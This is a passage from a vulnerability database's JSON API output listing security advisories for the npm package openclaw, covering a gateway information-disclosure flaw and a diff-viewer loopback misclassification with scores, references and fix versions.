                "GHSA-qqq7-4hxc-x63c"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w4p1-sxdg-hyha"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89489?format=api",
            "vulnerability_id": "VCID-w58d-6veg-uugy",
            "summary": "OpenClaw: Gateway hello snapshots exposed host config and state paths to non-admin clients\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gateway `connect` success snapshot exposed local `configPath` and `stateDir` metadata to non-admin clients. Low-privilege authenticated clients could learn host filesystem layout and deployment details that were not needed for their role.\n\n## Impact\n\nA non-admin client could recover host-specific filesystem paths and related deployment metadata, aiding host fingerprinting and chained attacks. This was an information-disclosure issue, not a direct authorization bypass.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `676b748056b5efca6f1255708e9dd9469edf5e2e` — limit connect snapshot metadata to admin-scoped clients\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @topsec-bunney for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41339",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11323",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11356",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00037",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11364",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41339"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/676b748056b5efca6f1255708e9dd9469edf5e2e"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2f7j-rp58-mr42"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41339",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41339"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:34:47Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-information-disclosure-via-gateway-connect-snapshot"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2f7j-rp58-mr42",
                    "reference_id": "GHSA-2f7j-rp58-mr42",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2f7j-rp58-mr42"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "CVE-2026-41339",
                "GHSA-2f7j-rp58-mr42"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w58d-6veg-uugy"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90188?format=api",
            "vulnerability_id": "VCID-watb-49vx-yub1",
            "summary": "OpenClaw: diffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n## Summary\ndiffs viewer misclassifies proxied remote requests as loopback when `allowRemoteViewer` is disabled\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: Shipped v2026.3.28 misclassified proxied diff-viewer requests as local loopback in some cases, a real but low-severity access-control flaw.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `30a1690323088fd291abd11643a264a6828a002c` — 2026-03-30T14:17:27-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @smaeljaish771 for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41403",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.0006",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19093",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0006",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19134",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.0006",
                            "scoring_system": "epss",
                            "scoring_elements": "0.19137",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41403"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/30a1690323088fd291abd11643a264a6828a002c"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3xv9-89fm-7h4r"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41403",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41403"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "2.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "4.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "6.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T19:09:33Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-via-proxied-remote-request-misclassification"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-3xv9-89fm-7h4r",
                    "reference_id": "GHSA-3xv9-89fm-7h4r",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-3xv9-89fm-7h4r"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41403",
                "GHSA-3xv9-89fm-7h4r"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-watb-49vx-yub1"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91185?format=api",
            "vulnerability_id": "VCID-wfkm-7ayk-uuhb",
